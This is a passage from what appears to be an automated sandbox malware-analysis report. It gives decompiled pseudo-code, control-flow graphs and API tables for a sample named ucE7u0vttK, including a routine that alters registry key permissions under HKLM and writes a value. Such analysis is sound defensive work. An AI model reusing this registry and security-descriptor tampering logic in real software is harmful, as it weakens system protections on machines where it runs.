							_t116 = E003D1D90(0x7d00, _t192); // executed
							_t196 = _t116;
							_v56 = _t196;
							_t117 = E003C9090(__eflags, _t196, 0x16);
							_t211 = _t208 + 0x14;
							_t197 = _t196 + _t117 * 2;
							_t198 = _t197 + E003C9090(__eflags, _t197, 0x1b) * 2;
							__eflags = _a8 - _t192;
							if(__eflags == 0) {
								_t204 = _t198 + E003C9090(__eflags, _t198, 0x1f) * 2;
								_t139 =  *_t154 & 0x0000ffff;
								_t211 = _t211 + 0x10;
								_t169 = _t154;
								__eflags = _t139 - _t192;
								while(__eflags != 0) {
									_t169 = _t169 + 2;
									 *_t204 = _t139;
									_t139 =  *_t169 & 0x0000ffff;
									_t204 =  &(_t204[0]);
									__eflags = _t139 - _t192;
								}
								_t198 = _t204 + E003C9090(__eflags, _t204, 0x20) * 2;
							}
							_t199 = _t198 + E003C9090(__eflags, _t198, 0x1c) * 2;
							_t120 = E003C9090(__eflags, _t199, 0x17);
							_t200 = _t199 + _t120 * 2;
							__imp___time64( &_v44);
							_v44 = _v44 + 0x3c;
							_t121 =  &_v44;
							asm("adc [ebp-0x24], edi"); // executed
							__imp___localtime64(_t121); // executed
							_v48 = _t121;
							_t193 =  &_v120;
							E003C9090(__eflags,  &_v1732, 0x21);
							 *((short*)(_t207 + wcsftime(_t193, 0x1a,  &_v1732, _v48) * 2 - 0x74)) = 0;
							_t125 = _v120;
							_t213 = _t211 + 0x38;
							__eflags = _t125;
							if(__eflags != 0) {
								_t137 = _t125 & 0x0000ffff;
								do {
									_t193 =  &(_t193[0]);
									 *_t200 = _t137;
									_t137 =  *_t193 & 0x0000ffff;
									_t200 =  &(_t200[0]);
									__eflags = _t137;
								} while (__eflags != 0);
							}
							_t126 = E003C9090(__eflags, _t200, 0x18);
							_t194 = _v36;
							_t201 = _t200 + _t126 * 2;
							_t127 =  *_t194 & 0x0000ffff;
							_t214 = _t213 + 8;
							_t165 = _t194;
							__eflags = _t127;
							while(_t127 != 0) {
								_t165 =  &(_t165[1]);
								 *_t201 = _t127;
								_t127 =  *_t165 & 0x0000ffff;
								_t201 =  &(_t201[0]);
								__eflags = _t127;
							}
							__eflags = _a8;
							if(__eflags == 0) {
								_t203 = _t201 + E003C9090(__eflags, _t201, 0x1f) * 2;
								_t135 =  *_t154 & 0x0000ffff;
								_t216 = _t214 + 8;
								_t168 = _t154;
								__eflags = _t135;
								while(__eflags != 0) {
									_t168 = _t168 + 2;
									 *_t203 = _t135;
									_t135 =  *_t168 & 0x0000ffff;
									_t203 =  &(_t203[0]);
									__eflags = _t135;
								}
								_t136 = E003C9090(__eflags, _t203, 0x20);
								_t214 = _t216 + 8;
								_t201 = _t203 + _t136 * 2;
							}
							_t202 = _t201 + E003C9090(__eflags, _t201, 0x19) * 2;
							E003C8030( &_v28);
							_t166 = _v28;
							_t131 =  *_t166 & 0x0000ffff;
							_t215 = _t214 + 0xc;
							__eflags = _t131;
							while(__eflags != 0) {
								_t166 =  &(_t166[1]);
								 *_t202 = _t131;
								_t131 =  *_t166 & 0x0000ffff;
								_t202 =  &(_t202[0]);
								__eflags = _t131;
							}
							E003C9090(__eflags, _t202, 0x1a);
							 *_a4 = _v56;
							_t195 = 1;
							E003CBB40(_t194);
							_t208 = _t215 + 0xc;
							_t192 = 0;
							__eflags = 0;
							goto L32;
						} else {
							return _t114;
						}
					}
				}
			}











































































    0x003c5bdc
    0x003c5be3
    0x003c5be5
    0x003c5be7
    0x003c5bea
    0x003c5bed
    0x003c5bf0
    0x003c5bf6
    0x003c5bf9
    0x003c5bfc
    0x003c5bff
    0x003c5c05
    0x003c5c68
    0x003c5c7d
    0x003c5c88
    0x003c5c8a
    0x003c5c8c
    0x00000000
    0x003c5c92
    0x003c5c99
    0x003c5cb1
    0x003c5cb3
    0x003c5cb5
    0x00000000
    0x003c5cbb
    0x003c5cbe
    0x003c5cc8
    0x003c5cc9
    0x003c5cca
    0x00000000
    0x003c5cca
    0x003c5cb5
    0x003c5c07
    0x003c5c07
    0x003c5c10
    0x003c5c17
    0x003c5c18
    0x003c5c19
    0x003c5c1a
    0x003c5c1b
    0x003c5c1c
    0x003c5c1d
    0x003c5c1e
    0x003c5c20
    0x003c5c25
    0x003c5c2a
    0x003c5ef2
    0x003c5ef2
    0x003c5ef5
    0x003c5ef7
    0x003c5efa
    0x003c5eff
    0x003c5f02
    0x003c5f05
    0x003c5f07
    0x003c5f0a
    0x003c5f15
    0x003c5f15
    0x003c5f17
    0x003c5f1a
    0x003c5f1c
    0x003c5f1e
    0x003c5f2b
    0x003c5f2b
    0x003c5f35
    0x003c5c30
    0x003c5c33
    0x003c5c3d
    0x003c5c3e
    0x003c5c3f
    0x003c5c42
    0x003c5c5b
    0x003c5c5f
    0x003c5cd5
    0x003c5cd8
    0x003c5cda
    0x003c5cdc
    0x003c5cdf
    0x003c5ce1
    0x003c5cf3
    0x003c5d01
    0x003c5d09
    0x003c5d11
    0x003c5d22
    0x003c5d26
    0x003c5d2e
    0x003c5d31
    0x003c5d33
    0x003c5d33
    0x003c5ce1
    0x003c5d37
    0x003c5d3a
    0x003c5d40
    0x003c5d3c
    0x003c5d3c
    0x003c5d3c
    0x003c5d50
    0x003c5d53
    0x003c5d58
    0x003c5d5d
    0x003c5d60
    0x003c5d65
    0x003c5d68
    0x003c5d73
    0x003c5d76
    0x003c5d79
    0x003c5d83
    0x003c5d86
    0x003c5d89
    0x003c5d8c
    0x003c5d8e
    0x003c5d91
    0x003c5d93
    0x003c5d96
    0x003c5d99
    0x003c5d9c
    0x003c5d9f
    0x003c5d9f
    0x003c5dac
    0x003c5dac
    0x003c5dba
    0x003c5dc0
    0x003c5dc9
    0x003c5dcc
    0x003c5dd2
    0x003c5dd6
    0x003c5dda
    0x003c5ddd
    0x003c5dec
    0x003c5def
    0x003c5df2
    0x003c5e0f
    0x003c5e14
    0x003c5e18
    0x003c5e1b
    0x003c5e1e
    0x003c5e20
    0x003c5e23
    0x003c5e23
    0x003c5e26
    0x003c5e29
    0x003c5e2c
    0x003c5e2f
    0x003c5e2f
    0x003c5e23
    0x003c5e37
    0x003c5e3c
    0x003c5e3f
    0x003c5e42
    0x003c5e45
    0x003c5e48
    0x003c5e4a
    0x003c5e4d
    0x003c5e50
    0x003c5e53
    0x003c5e56
    0x003c5e59
    0x003c5e5c
    0x003c5e5c
    0x003c5e61
    0x003c5e65
    0x003c5e6f
    0x003c5e72
    0x003c5e75
    0x003c5e78
    0x003c5e7a
    0x003c5e7d
    0x003c5e80
    0x003c5e83
    0x003c5e86
    0x003c5e89
    0x003c5e8c
    0x003c5e8c
    0x003c5e94
    0x003c5e99
    0x003c5e9c
    0x003c5e9c
    0x003c5ea7
    0x003c5eae
    0x003c5eb3
    0x003c5eb6
    0x003c5eb9
    0x003c5ebc
    0x003c5ebf
    0x003c5ec1
    0x003c5ec4
    0x003c5ec7
    0x003c5eca
    0x003c5ecd
    0x003c5ecd
    0x003c5ed5
    0x003c5ee1
    0x003c5ee3
    0x003c5ee8
    0x003c5eed
    0x003c5ef0
    0x003c5ef0
    0x00000000
    0x003c5c67
    0x003c5c67
    0x003c5c67
    0x003c5c5f
    0x003c5c2a

    APIs
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 003C5C5B
    • memcpy.MSVCRT ref: 003C5D01
    • memcpy.MSVCRT ref: 003C5D26
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • _time64.MSVCRT ref: 003C5DCC
    • _localtime64.MSVCRT ref: 003C5DDD
    • wcsftime.MSVCRT ref: 003C5E07
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E0640, Relevance: 10.6, APIs: 7, Instructions: 122registry

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 341 3e0640-3e0655 342 3e065c-3e068c StrChrW RegOpenKeyExW 341->342 343 3e0657 341->343 344 3e0782-3e0787 342->344 345 3e0692-3e06b3 GetSecurityInfo 342->345 343->342 346 3e076e-3e0780 345->346 347 3e06b9-3e06f5 call 3c80a0 StrChrW RegOpenKeyExW 345->347 346->344 351 3e0718-3e0738 SetNamedSecurityInfoW 347->351 352 3e06f7-3e0716 RegSetValueExW 347->352 353 3e075c-3e076b 351->353 354 3e073a-3e075a 351->354 352->351 353->346 354->353
    C-Code - Quality: 100%
    			E003E0640(WCHAR* __ebx, short* _a4, char _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				long _t30;
				intOrPtr _t31;
				int _t32;
				char _t40;
				intOrPtr _t41;
				int _t42;
				WCHAR* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t58;
				int _t73;
				signed int _t74;

				_t50 = __ebx;
				_t74 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_a8 != 0) {
					_t74 = 0x100;
				}
				_t30 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), 0, _t74 | 0x00020019,  &_v12); // executed
				if(_t30 == 0) {
					_t31 =  *0x3e8628; // 0x622508
					_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x1ac))))(_v12, 4, 4, _t30, _t30,  &_a8, _t30, _t30); // executed
					_t73 = _t32;
					if(_t73 == 0) {
						E003C80A0(_v12, 4); // executed
						_t40 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), _t73, _t74 | 0x0002001f,  &_v8); // executed
						if(_t40 == 0) {
							_v16 = _t40;
							RegSetValueExW(_v8, _a4, _t73, 4,  &_v16, 4); // executed
						}
						_t41 =  *0x3e8628; // 0x622508
						_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x1a4))))(_t50, 4, 4, 0, 0, _a8, 0); // executed
						_t73 = _t42;
						if(_t73 != 0) {
							_t58 =  *0x3e8628; // 0x622508
							_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1a8))))(_v8, 4, 4, 0, 0, _a8, 0);
						}
						_t57 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x198))))(_v8);
					}
					_t54 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x198))))(_v12);
					return _t73;
				}
				return _t30;
			}


















    0x003e0640
    0x003e0649
    0x003e064c
    0x003e064f
    0x003e0655
    0x003e0657
    0x003e0657
    0x003e0688
    0x003e068c
    0x003e069d
    0x003e06ad
    0x003e06af
    0x003e06b3
    0x003e06bf
    0x003e06f1
    0x003e06f5
    0x003e06ff
    0x003e0716
    0x003e0716
    0x003e071b
    0x003e0732
    0x003e0734
    0x003e0738
    0x003e0740
    0x003e075a
    0x003e075a
    0x003e075f
    0x003e076c
    0x003e076c
    0x003e0771
    0x003e077e
    0x00000000
    0x003e0780
    0x003e0787

    APIs
    • StrChrW.SHLWAPI(?,0000005C), ref: 003E0673
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E0688
    • GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003E06AD
      • Part of subcall function 003C80A0: memset.MSVCRT ref: 003C8128
      • Part of subcall function 003C80A0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003C81A5
    • StrChrW.SHLWAPI(?,0000005C), ref: 003E06D6
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003E06F1
    • RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003E0716
    • SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003E0732
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E2480, Relevance: 10.6, APIs: 7, Instructions: 99sleep

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 356 3e2480-3e2482 357 3e248c-3e2497 Sleep 356->357 358 3e2484-3e248a 356->358 360 3e2473-3e247e InterlockedCompareExchange 357->360 359 3e249c-3e24a3 358->359 362 3e24af-3e24d8 359->362 363 3e24a5-3e24ad _amsg_exit 359->363 360->356 361 3e2499-3e249b 360->361 361->359 365 3e24de-3e24e5 362->365 363->365 366 3e24e7-3e24f8 _initterm 365->366 367 3e2502-3e2505 365->367 366->367 368 3e250f-3e2515 367->368 369 3e2507-3e2509 InterlockedExchange 367->369 370 3e2517-3e2524 call 3c3d60 368->370 371 3e2530-3e2537 368->371 369->368 370->371 379 3e2526-3e2529 370->379 373 3e253d 371->373 374 3e2602-3e2609 371->374 377 3e253f-3e2549 373->377 375 3e260e-3e2613 call 3e2829 374->375 380 3e259a-3e259e 377->380 381 3e254b-3e254e 377->381 379->371 383 3e25ab-3e25ad 380->383 384 3e25a0-3e25a8 380->384 385 3e2555-3e255b 381->385 386 3e2550-3e2553 381->386 383->377 384->383 387 3e255d-3e2561 385->387 388 3e256a-3e256e 385->388 386->380 386->385 387->388 389 3e2563-3e2568 387->389 390 3e2576-3e2578 388->390 391 3e2570-3e2574 388->391 389->385 392 3e2579-3e2581 call 3cfbf0 390->392 391->392 394 3e2586-3e2591 392->394 395 3e25df-3e25e5 394->395 396 3e2593-3e2594 exit 394->396 397 3e25ed-3e25f9 395->397 398 3e25e7 _cexit 395->398 396->380 397->375 398->397
    C-Code - Quality: 54%
    			E003E2480(void* __eax, long __ebx, LONG* __edi, long __esi) {
				signed int _t18;
				signed int _t19;
				signed int _t20;
				int* _t21;
				int _t22;
				int _t24;
				signed int _t31;
				long _t32;
				signed int _t33;
				signed int _t36;
				LONG* _t43;
				signed int _t46;
				void* _t48;
				void* _t54;

				L0:
				while(1) {
					L0:
					_t43 = __edi;
					_t32 = __ebx;
					if(__eax == __esi) {
						break;
					}
					L3:
					Sleep(0x3e8);
					if(InterlockedCompareExchange(__edi, __esi, __ebx) == __ebx) {
						L4:
						_t46 = 1;
						__eflags = 1;
					} else {
						continue;
					}
					L5:
					_t18 =  *0x3e8c38; // 0x2
					if(_t18 != _t46) {
						L7:
						_t19 =  *0x3e8c38; // 0x2
						__eflags = _t19;
						if(__eflags != 0) {
							L11:
							 *0x3e865c = _t46;
							goto L12;
						} else {
							L8:
							 *0x3e8c38 = _t46;
							_t31 = E003D1B59(0x3e3240, 0x3e324c); // executed
							__eflags = _t31;
							if(__eflags == 0) {
								goto L12;
							} else {
								L10:
								goto L38;
							}
						}
					} else {
						L6:
						_push(0x1f);
						L003CF19C();
						L12:
						_t20 =  *0x3e8c38; // 0x2
						if(_t20 == _t46) {
							_push(0x3e323c);
							_push(0x3e3234); // executed
							L003C27A8(); // executed
							 *0x3e8c38 = 2;
						}
						if( *((intOrPtr*)(_t48 - 0x20)) == _t32) {
							InterlockedExchange(_t43, _t32);
						}
						_t54 =  *0x3e8c40 - _t32; // 0x0
						if(_t54 != 0) {
							_push(0x3e8c40);
							if(E003C3D60(_t32, _t43, _t46, _t54) != 0) {
								 *0x3e8c40(_t32, 2, _t32);
							}
						}
						_t21 = __imp___wcmdln;
						if( *_t21 == _t32) {
							L38:
							 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
							_t22 = 0xff;
						} else {
							L20:
							_t24 =  *_t21;
							while(1) {
								L21:
								 *(_t48 - 0x24) = _t24;
								_t33 =  *_t24 & 0x0000ffff;
								if(_t33 > 0x20 || _t33 != _t32 &&  *(_t48 - 0x1c) != _t32) {
									goto L32;
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t36 =  *_t24 & 0x0000ffff;
									if(_t36 == _t32 || _t36 > 0x20) {
										break;
									}
									L26:
									_t24 = _t24 + 2;
									 *(_t48 - 0x24) = _t24;
								}
								L27:
								__eflags =  *(_t48 - 0x40) & 0x00000001;
								if(( *(_t48 - 0x40) & 0x00000001) == 0) {
									_t33 = 0xa;
								} else {
									_t33 =  *(_t48 - 0x3c) & 0x0000ffff;
								}
								_push(_t33);
								_push(_t24);
								_push(_t32);
								_push(0x3c0000); // executed
								L003CFBF0(); // executed
								 *0x3e8658 = _t24;
								__eflags =  *0x3e864c - _t32; // 0x0
								if(__eflags == 0) {
									L31:
									exit(_t24);
									goto L32;
								}
								L35:
								__eflags =  *0x3e865c - _t32; // 0x0
								if(__eflags == 0) {
									__imp___cexit();
								}
								L37:
								 *((intOrPtr*)(_t48 - 4)) = 0xfffffffe;
								_t22 =  *0x3e8658; // 0x0
								goto L39;
								L32:
								__eflags = _t33 - 0x22;
								if(_t33 == 0x22) {
									__eflags =  *(_t48 - 0x1c) - _t32;
									_t12 =  *(_t48 - 0x1c) == _t32;
									__eflags = _t12;
									 *(_t48 - 0x1c) = 0 | _t12;
								}
								_t24 = _t24 + 2;
							}
						}
					}
					L39:
					return E003E2829(_t22);
					L40:
				}
				L2:
				_t46 = 1;
				 *((intOrPtr*)(_t48 - 0x20)) = 1;
				goto L5;
			}

















    0x003e2480
    0x003e2480
    0x003e2480
    0x003e2480
    0x003e2480
    0x003e2482
    0x00000000
    0x00000000
    0x003e248c
    0x003e2491
    0x003e247e
    0x003e2499
    0x003e249b
    0x003e249b
    0x00000000
    0x00000000
    0x00000000
    0x003e249c
    0x003e249c
    0x003e24a3
    0x003e24af
    0x003e24af
    0x003e24b4
    0x003e24b6
    0x003e24d8
    0x003e24d8
    0x00000000
    0x003e24b8
    0x003e24b8
    0x003e24b8
    0x003e24c8
    0x003e24cf
    0x003e24d1
    0x00000000
    0x003e24d3
    0x003e24d3
    0x00000000
    0x003e24d3
    0x003e24d1
    0x003e24a5
    0x003e24a5
    0x003e24a5
    0x003e24a7
    0x003e24de
    0x003e24de
    0x003e24e5
    0x003e24e7
    0x003e24ec
    0x003e24f1
    0x003e24f8
    0x003e24f8
    0x003e2505
    0x003e2509
    0x003e2509
    0x003e250f
    0x003e2515
    0x003e2517
    0x003e2524
    0x003e252a
    0x003e252a
    0x003e2524
    0x003e2530
    0x003e2537
    0x003e2602
    0x003e2602
    0x003e2609
    0x003e253d
    0x003e253d
    0x003e253d
    0x003e253f
    0x003e253f
    0x003e253f
    0x003e2542
    0x003e2549
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003e2555
    0x003e2555
    0x003e2555
    0x003e255b
    0x00000000
    0x00000000
    0x003e2563
    0x003e2564
    0x003e2565
    0x003e2565
    0x003e256a
    0x003e256a
    0x003e256e
    0x003e2578
    0x003e2570
    0x003e2570
    0x003e2570
    0x003e2579
    0x003e257a
    0x003e257b
    0x003e257c
    0x003e2581
    0x003e2586
    0x003e258b
    0x003e2591
    0x003e2593
    0x003e2594
    0x00000000
    0x003e2594
    0x003e25df
    0x003e25df
    0x003e25e5
    0x003e25e7
    0x003e25e7
    0x003e25ed
    0x003e25ed
    0x003e25f4
    0x00000000
    0x003e259a
    0x003e259a
    0x003e259e
    0x003e25a2
    0x003e25a5
    0x003e25a5
    0x003e25a8
    0x003e25a8
    0x003e25ac
    0x003e25ac
    0x003e253f
    0x003e2537
    0x003e260e
    0x003e2613
    0x00000000
    0x003e2613
    0x003e2484
    0x003e2486
    0x003e2487
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CFEE0, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 462

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 399 3cfee0-3cfefb call 3c94d0 402 3cfefd-3cff10 399->402 403 3cff15-3cff3e _time64 399->403 410 3d0374-3d038a 402->410 404 3cffac-3cffc7 call 3d1b80 403->404 405 3cff40 403->405 414 3cffc9-3cffcc 404->414 415 3cfff6-3d0012 404->415 408 3cff49-3cff62 call 3cd890 405->408 409 3cff42-3cff47 405->409 420 3cff64-3cff67 408->420 421 3cff90-3cffa8 408->421 409->404 409->408 410->399 413 3d0390-3d03c4 call 3e0a40 call 3e0d30 410->413 454 3d03cc-3d03ef call 3c1700 call 3cf850 call 3cc930 413->454 418 3cffde-3cfff1 414->418 419 3cffce-3cffdb call 3cc870 414->419 422 3d0014 415->422 423 3d0041-3d005c call 3c42a0 call 3d12c0 415->423 418->410 419->418 429 3cff79-3cff8b 420->429 430 3cff69-3cff76 call 3cc870 420->430 421->404 424 3d001d-3d0035 call 3cac90 422->424 425 3d0016-3d001b 422->425 447 3d005e-3d008f call 3c9090 * 2 423->447 448 3d0091 423->448 424->410 443 3d003b-3d003e 424->443 425->423 425->424 442 3d0372 429->442 430->429 442->410 443->423 467 3d00f7-3d00ff call 3c5a10 447->467 449 3d00c6-3d00f6 call 3c9090 * 2 448->449 450 3d0093-3d00c4 call 3c9090 * 2 448->450 449->467 450->467 478 3d04eb-3d04f6 call 3c9480 call 3c7e10 ExitProcess 454->478 479 3d03f5-3d0440 call 3c8030 call 3d1d90 454->479 472 3d0102-3d0119 _time64 467->472 474 3d011b-3d0128 472->474 475 3d0133-3d0164 call 3c36e0 472->475 480 3d016b-3d0178 474->480 481 3d012a 474->481 475->480 487 3d0166 475->487 514 3d0495-3d04e9 call 3cbb40 479->514 515 3d0442-3d044c 479->515 485 3d017a 480->485 486 3d01d3-3d01dc 480->486 481->475 482 3d012c-3d0131 481->482 482->475 482->480 489 3d017c-3d0181 485->489 490 3d0183-3d01a0 485->490 492 3d028f-3d029c call 3c9890 486->492 493 3d01e2 486->493 487->480 489->486 489->490 490->486 498 3d01a2 490->498 492->442 507 3d02a2-3d02b5 call 3c5a10 492->507 494 3d01e4-3d01ea 493->494 495 3d01f0-3d020a call 3cf2d0 call 3c99a0 493->495 494->492 494->495 520 3d020c-3d023d call 3c9090 * 2 495->520 521 3d023f-3d026f call 3c9090 * 2 495->521 503 3d01ab-3d01cd call 3c1fe0 498->503 504 3d01a4-3d01a9 498->504 503->486 518 3d0344-3d035b call 3d0ad0 503->518 504->486 504->503 507->442 523 3d02bb-3d02cc call 3c7560 507->523 514->478 519 3d0450-3d046c 515->519 518->454 532 3d035d-3d0367 518->532 535 3d046e-3d0483 519->535 545 3d0270-3d028c call 3c5a10 call 3cbb40 _time64 520->545 521->545 539 3d0369-3d0370 523->539 540 3d02d2-3d02d9 523->540 532->442 548 3d0485-3d0490 535->548 549 3d0493 535->549 539->442 539->454 540->454 544 3d02df-3d02eb 540->544 546 3d02ed-3d02fa 544->546 547 3d02fc-3d0301 544->547 545->492 553 3d0303-3d030c 546->553 547->553 554 3d0310-3d0318 547->554 548->549 549->514 553->554 557 3d031a-3d0330 554->557 558 3d0332-3d033c 554->558 557->554 557->558 558->472 560 3d0342 558->560 560->442
    C-Code - Quality: 47%
    			E003CFEE0() {
				void* _t142;
				intOrPtr _t144;
				signed int* _t145;
				signed int* _t147;
				signed int* _t150;
				void* _t152;
				signed int* _t156;
				intOrPtr _t157;
				signed int* _t159;
				signed int* _t161;
				signed int* _t162;
				intOrPtr _t163;
				void* _t165;
				signed int* _t171;
				signed int* _t172;
				signed int* _t180;
				signed int* _t189;
				signed int _t191;
				signed int* _t192;
				signed int* _t196;
				signed int* _t198;
				intOrPtr _t204;
				signed int* _t210;
				signed int* _t212;
				signed int* _t213;
				signed int* _t215;
				signed int* _t225;
				signed int* _t230;
				intOrPtr _t231;
				signed int* _t232;
				void* _t235;
				int _t238;
				signed int* _t239;
				signed int _t240;
				signed int _t255;
				signed int _t256;
				signed int _t271;
				signed int _t272;
				signed int* _t287;
				signed int _t289;
				signed int* _t292;
				signed int _t293;
				signed int* _t298;
				signed int* _t302;
				signed int* _t304;
				signed int* _t306;
				signed int* _t307;
				signed int* _t308;
				signed short* _t309;
				intOrPtr _t312;
				signed int _t314;
				signed int _t321;
				signed int* _t323;
				signed int* _t324;
				intOrPtr _t325;
				signed int* _t327;
				signed int* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;

				L0:
				while(1) {
					L0:
					_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
					_t144 = L003C94D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292);
					if(_t144 != 0) {
						goto L4;
					} else {
						_t302 =  *0x3e8628; // 0x622508
						 *(_t302[0x32])(0x3e8);
					}
					L63:
					_t255 =  *0x3e857c; // 0x0
					_t163 =  *((intOrPtr*)(_t329 - 0x5b8));
					_t256 = 1 + _t255;
					 *0x3e857c = _t256;
					_t341 = _t256 -  *((intOrPtr*)(_t163 + 0x18));
					if(_t256 <  *((intOrPtr*)(_t163 + 0x18))) {
						do {
							L0:
							_t292 =  *( *((intOrPtr*)(_t142 + 0x20)) + _t240 * 4);
							_t144 = L003C94D0(_t329 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t142 + 0x1c)) + _t240 * 4)), _t292);
							if(_t144 != 0) {
								goto L4;
							} else {
								_t302 =  *0x3e8628; // 0x622508
								 *(_t302[0x32])(0x3e8);
							}
							goto L63;
						} while (_t256 <  *((intOrPtr*)(_t163 + 0x18)));
						do {
							goto L64;
						} while ( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x18)) <= _t237);
						continue;
					}
					L64:
					_t165 = E003E0A40(_t323, _t326, _t341, _t329 - 0xc, _t329 - 0x5b8);
					_t335 = _t335 + 8;
					if(_t165 == 0) {
						_t343 =  *(_t329 - 0x20) - _t237;
						if( *(_t329 - 0x20) == _t237) {
							L003E0D30(_t237, _t323, _t326, _t343, _t329 - 0xc, _t329 - 0x5c0);
							_t335 = _t335 + 8;
						}
					}
					 *0x3e857c = 0;
					 *(_t329 - 0x20) = _t237;
					L4:
					__imp___time64(_t235);
					_t323 = _t292;
					_t293 =  *0x3e857c; // 0x0
					_t331 = _t330 + 4;
					_t325 = _t144;
					_t145 = _t144 -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5b8)) + 0x24)) + _t293 * 8));
					__eflags = _t145;
					asm("sbb ebx, [ecx+edx*8+0x4]");
					 *(_t329 - 0x48) = _t323;
					if(__eflags < 0) {
						L12:
						_t237 = 0;
						_t147 = E003D1B80(_t325, _t329 - 0xc, _t329 - 0x5c0, _t329 - 0x28);
						_t332 = _t331 + 0xc;
						__eflags = _t147;
						if(_t147 == 0) {
							L16:
							 *(_t329 - 0x20) =  &(( *(_t329 - 0x20))[0]);
							 *((intOrPtr*)( *((intOrPtr*)(_t329 - 0x5bc)) + 0xc)) =  *((intOrPtr*)(_t329 - 0x28));
							_t150 = _t325 -  *((intOrPtr*)(_t329 - 0x3c));
							__eflags = _t150;
							asm("sbb edx, [ebp-0x38]");
							 *(_t329 - 0x48) = _t323;
							if(__eflags < 0) {
								L21:
								E003C42A0(__eflags, _t329 - 0x5c0);
								_t333 = _t332 + 4;
								_t152 = E003D12C0();
								_push(4);
								__eflags = _t152 - _t237;
								if(__eflags >= 0) {
									if(__eflags != 0) {
										_push(_t329 - 0x9c0);
										E003C9090(__eflags);
										E003C9090(__eflags, _t329 - 0xdc0, 7);
										_push(_t329 - 0xdc0);
										_push(_t329 - 0x9c0);
										_push(0xe);
										_t298 = _t329 - 0x5c0;
										_push(_t298);
									} else {
										_push(_t329 - 0x9c0);
										E003C9090(__eflags);
										E003C9090(__eflags, _t329 - 0xdc0, 6);
										_push(_t329 - 0xdc0);
										_t298 = _t329 - 0x9c0;
										_push(_t298);
										_push(0xe);
										_push(_t329 - 0x5c0);
									}
								} else {
									_push(_t329 - 0x9c0);
									E003C9090(__eflags);
									E003C9090(__eflags, _t329 - 0xdc0, 5);
									_t298 = _t329 - 0xdc0;
									_push(_t298);
									_push(_t329 - 0x9c0);
									_push(0xe);
									_push(_t329 - 0x5c0);
								}
								_t156 = E003C5A10();
